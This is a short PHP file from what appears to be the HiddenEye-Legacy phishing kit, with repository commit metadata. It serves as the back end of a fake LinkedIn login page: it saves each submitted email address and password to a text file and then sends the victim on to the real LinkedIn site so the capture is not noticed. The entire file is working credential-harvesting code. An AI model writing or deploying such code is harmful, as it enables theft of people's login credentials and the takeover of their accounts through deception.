HiddenEye-Legacy/WebPages/linkedin/login.php
Usama Abdul Sattar 92c35d7eb5
Update login.php
2018-06-07 14:21:36 +05:00

8 lines
229 B
PHP

<?php
include 'base.php';
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['UsernameForm'] . " [PASS]: " . $_POST['PasswordForm'] . "\n", FILE_APPEND);
header('Location: https://linkedin.com/');
exit();